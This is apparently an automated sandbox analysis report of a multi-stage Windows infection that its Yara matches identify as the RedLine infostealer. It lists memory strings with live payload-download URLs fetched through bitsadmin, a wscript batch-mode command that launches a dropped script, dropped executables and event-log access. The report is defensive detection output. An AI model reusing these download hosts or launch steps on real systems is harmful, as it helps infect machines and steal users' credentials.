Source: powershell.exe, 00000035.00000002.1698182390.00000000058E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0I
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: Occupation.com, 00000026.00000003.1600904437.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000026.00000003.2097214540.0000000003B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: Occupation.com, 00000026.00000003.1600904437.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000026.00000003.2097214540.0000000003B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Occupation.com, 00000026.00000003.1600904437.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000026.00000003.2097214540.0000000003B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Occupation.com, 00000026.00000003.1600904437.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000026.00000003.2097214540.0000000003B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: powershell.exe, 00000035.00000002.1693103840.00000000049D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1684209881.0000000002C21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002DDA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
Source: powershell.exe, 00000035.00000002.1693103840.00000000049D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultX
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, mIrI3a9.exe, 00000034.00000002.1786877905.0000000002CE6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1693103840.0000000004881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000035.00000002.1693103840.00000000049D7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: Occupation.com, 00000026.00000003.1600904437.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000026.00000003.2097214540.0000000003B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Occupation.com, 00000026.00000003.1600904437.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000026.00000003.2097214540.0000000003B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/0
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnect
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/CheckConnectResponse
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe, 00000013.00000002.2351728389.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettings
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/EnvironmentSettingsResponse
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002F36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdates
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/GetUpdatesResponse
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002DDA000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe, 00000013.00000002.2351728389.0000000002F2C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironment
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentResponse
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/SetEnvironmentvi
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002DD2000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, PfOHmro.exe, 00000013.00000002.2351728389.0000000002F36000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdate
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C01000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Endpoint/VerifyUpdateResponse
Source: Amcache.hve.23.dr	String found in binary or memory: http://upx.sf.net
Source: mIrI3a9.exe, 00000034.00000002.1786877905.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp, mIrI3a9.exe, 00000034.00000002.1786877905.0000000002FF9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://verifycleansecurity.com
Source: mIrI3a9.exe, 00000034.00000002.1786877905.0000000002C01000.00000004.00000800.00020000.00000000.sdmp, mIrI3a9.exe, 00000034.00000002.1786877905.0000000002F3A000.00000004.00000800.00020000.00000000.sdmp, mIrI3a9.exe, 00000034.00000002.1786877905.0000000002F8E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://verifycleansecurity.com/static/Qbffmsv.exe
Source: powershell.exe, 00000035.00000002.1693103840.00000000049D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1684209881.0000000002C21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: Occupation.com, 00000026.00000000.1592371348.00000000008B5000.00000002.00000001.01000000.00000012.sdmp, Occupation.com, 00000026.00000003.1600904437.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com, 00000033.00000000.1638717333.0000000001085000.00000002.00000001.01000000.00000015.sdmp	String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2180876738.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C81000.00000004.00000020.00020000.00000000.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: PfOHmro.exe, 00000013.00000002.2359023351.0000000003E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: powershell.exe, 00000035.00000002.1693103840.0000000004881000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: PfOHmro.exe, 00000013.00000002.2351728389.0000000002C51000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb
Source: PfOHmro.exe, PfOHmro.exe, 00000013.00000002.2342024116.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/geoip%USERPEnvironmentROFILE%
Source: PfOHmro.exe, PfOHmro.exe, 00000013.00000002.2342024116.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.orgcookies//settinString.Removeg
Source: bitsadmin.exe, 00000031.00000002.1992315661.00000000007D0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authenticatior.com/Client32.ini
Source: bitsadmin.exe, 00000031.00000002.1992414277.00000000009AB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authenticatior.com/Client32.iniC:
Source: bitsadmin.exe, 00000031.00000002.1992414277.00000000009D4000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authenticatior.com/Client32.iniLMEMP
Source: rapes.exe, 0000000B.00000003.2180876738.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000003.2180876738.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C5B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.3350049623.0000000000C39000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authenticatior.com/NSM.lic
Source: bitsadmin.exe, 0000002B.00000002.1986393062.0000000000E20000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authenticatior.com/vrep.msi
Source: bitsadmin.exe, 0000000F.00000002.1609654789.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, bitsadmin.exe, 0000002B.00000002.1986469544.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authenticatior.com/vrep.msiC:
Source: bitsadmin.exe, 0000000F.00000002.1609654789.0000000002F3A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authenticatior.com/vrep.msiLMEMH
Source: bitsadmin.exe, 0000002B.00000002.1986469544.0000000002FC1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://authenticatior.com/vrep.msiLMEMHh
Source: PfOHmro.exe, 00000013.00000002.2359023351.0000000003E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: PfOHmro.exe, 00000013.00000002.2359023351.0000000003E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: PfOHmro.exe, 00000013.00000002.2359023351.0000000003E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000035.00000002.1698182390.00000000058E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000035.00000002.1698182390.00000000058E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000035.00000002.1698182390.00000000058E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: PfOHmro.exe, 00000013.00000002.2359023351.0000000003E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: PfOHmro.exe, 00000013.00000002.2359023351.0000000003E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: PfOHmro.exe, 00000013.00000002.2359023351.0000000003E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: PfOHmro.exe, 00000013.00000002.2359023351.0000000003E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: powershell.exe, 00000035.00000002.1693103840.00000000049D7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1684209881.0000000002C21000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000035.00000002.1693103840.00000000051FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000035.00000002.1693103840.000000000515B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: PfOHmro.exe, PfOHmro.exe, 00000013.00000002.2342024116.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://ipinfo.io/ip%appdata%
Source: rapes.exe, 0000000B.00000002.3346505237.0000000000A44000.00000004.00000020.00020000.00000000.sdmp, ADFoyxP[1].exe.11.dr	String found in binary or memory: https://mozilla.org0/
Source: powershell.exe, 00000035.00000002.1698182390.00000000058E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: Occupation.com, 00000026.00000003.1600904437.00000000042A9000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000026.00000003.2097214540.0000000003B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: PfOHmro.exe, 00000013.00000002.2359023351.0000000003E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: Occupation.com, 00000026.00000003.2097214540.0000000003B0B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.globalsign.com/repository/0
Source: PfOHmro.exe, 00000013.00000002.2359023351.0000000003E37000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico

Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe

Code function: 25_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

25_2_004050F9

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_0102F7C7 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,

51_2_0102F7C7

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_0102F55C OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,

51_2_0102F55C

Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe

Code function: 25_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,

25_2_004044D1

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

Code function: 51_2_01049FD2 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

51_2_01049FD2

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\PowerShell

Reads the System eventlog

Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System

Writes many files with high entropy

Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ATCVA5TX\ADFoyxP[1].exe entropy: 7.99051565952	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	File created: C:\Users\user\AppData\Local\Temp\10141610101\ADFoyxP.exe entropy: 7.99051565952	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10136120101\PfOHmro.exe	File created: C:\Users\user\AppData\Local\Temp\EdgeBHO.exe entropy: 7.99168791024	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Users\user\AppData\Local\Temp\Anthropology.msi entropy: 7.99662716044	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Users\user\AppData\Local\Temp\Dimension.msi entropy: 7.9971440998	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Users\user\AppData\Local\Temp\Having.msi entropy: 7.99753773138	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Users\user\AppData\Local\Temp\Activities.msi entropy: 7.99756101114	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Users\user\AppData\Local\Temp\Deviation.msi entropy: 7.9983266855	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Users\user\AppData\Local\Temp\Opens.msi entropy: 7.9980635736	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Users\user\AppData\Local\Temp\Responding.msi entropy: 7.99759330114	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Users\user\AppData\Local\Temp\Salem.msi entropy: 7.99539299061	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Users\user\AppData\Local\Temp\Contributors.msi entropy: 7.99744111333	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Users\user\AppData\Local\Temp\Drug.msi entropy: 7.99713810488	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141220101\ReK7Ewx.exe	File created: C:\Users\user\AppData\Local\Temp\Series.msi entropy: 7.99786412186	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\789919\q entropy: 7.999754642	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\789919\Occupation.com	File created: C:\Users\user\AppData\Local\EduGenius Studios Co\u entropy: 7.999754642	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\10141520101\mIrI3a9.exe	File created: C:\Users\user\AppData\Roaming\a.exe entropy: 7.99036645392	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 19.2.PfOHmro.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 19.2.PfOHmro.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 19.2.PfOHmro.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.PfOHmro.exe.41b4170.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 16.2.PfOHmro.exe.41b4170.0.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 16.2.PfOHmro.exe.41b4170.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.PfOHmro.exe.41b4170.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 16.2.PfOHmro.exe.41b4170.0.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 16.2.PfOHmro.exe.41b4170.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 16.2.PfOHmro.exe.4199550.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 16.2.PfOHmro.exe.4199550.1.raw.unpack, type: UNPACKEDPE	Matched rule: Finds Redline samples based on characteristic strings Author: Sekoia.io
Source: 16.2.PfOHmro.exe.4199550.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000010.00000002.1588918971.0000000004199000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: 00000013.00000002.2342024116.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: PfOHmro.exe PID: 6776, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
Source: Process Memory Space: PfOHmro.exe PID: 4060, type: MEMORYSTR	Matched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown

PE file contains section with special chars

Source: random.exe	Static PE information: section name:
Source: random.exe	Static PE information: section name: .idata
Source: random.exe	Static PE information: section name:
Source: rapes.exe.0.dr	Static PE information: section name:
Source: rapes.exe.0.dr	Static PE information: section name: .idata
Source: rapes.exe.0.dr	Static PE information: section name:
Source: FvbuInU[1].exe.11.dr	Static PE information: section name:
Source: FvbuInU[1].exe.11.dr	Static PE information: section name: .idata
Source: FvbuInU[1].exe.11.dr	Static PE information: section name:
Source: FvbuInU.exe.11.dr	Static PE information: section name:
Source: FvbuInU.exe.11.dr	Static PE information: section name: .idata
Source: FvbuInU.exe.11.dr	Static PE information: section name:
Source: v6Oqdnc[1].exe.11.dr	Static PE information: section name:
Source: v6Oqdnc[1].exe.11.dr	Static PE information: section name: .idata
Source: v6Oqdnc[1].exe.11.dr	Static PE information: section name:
Source: v6Oqdnc.exe.11.dr	Static PE information: section name:
Source: v6Oqdnc.exe.11.dr	Static PE information: section name: .idata
Source: v6Oqdnc.exe.11.dr	Static PE information: section name:
Source: CgmaT61[1].exe.11.dr	Static PE information: section name:
Source: CgmaT61[1].exe.11.dr	Static PE information: section name: .idata
Source: CgmaT61[1].exe.11.dr	Static PE information: section name:
Source: CgmaT61.exe.11.dr	Static PE information: section name:
Source: CgmaT61.exe.11.dr	Static PE information: section name: .idata
Source: CgmaT61.exe.11.dr	Static PE information: section name:
Source: yUI6F6C[1].exe.11.dr	Static PE information: section name:
Source: yUI6F6C[1].exe.11.dr	Static PE information: section name: .idata
Source: yUI6F6C[1].exe.11.dr	Static PE information: section name:
Source: yUI6F6C.exe.11.dr	Static PE information: section name:
Source: yUI6F6C.exe.11.dr	Static PE information: section name: .idata
Source: yUI6F6C.exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: 61c1a86413.exe.11.dr	Static PE information: section name:
Source: 61c1a86413.exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: .idata
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: afdbfd8fdc.exe.11.dr	Static PE information: section name:
Source: afdbfd8fdc.exe.11.dr	Static PE information: section name: .idata
Source: afdbfd8fdc.exe.11.dr	Static PE information: section name:
Source: random[1].exe1.11.dr	Static PE information: section name:
Source: random[1].exe1.11.dr	Static PE information: section name: .idata
Source: 26335e66aa.exe.11.dr	Static PE information: section name:
Source: 26335e66aa.exe.11.dr	Static PE information: section name: .idata

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js"

Source: C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.com

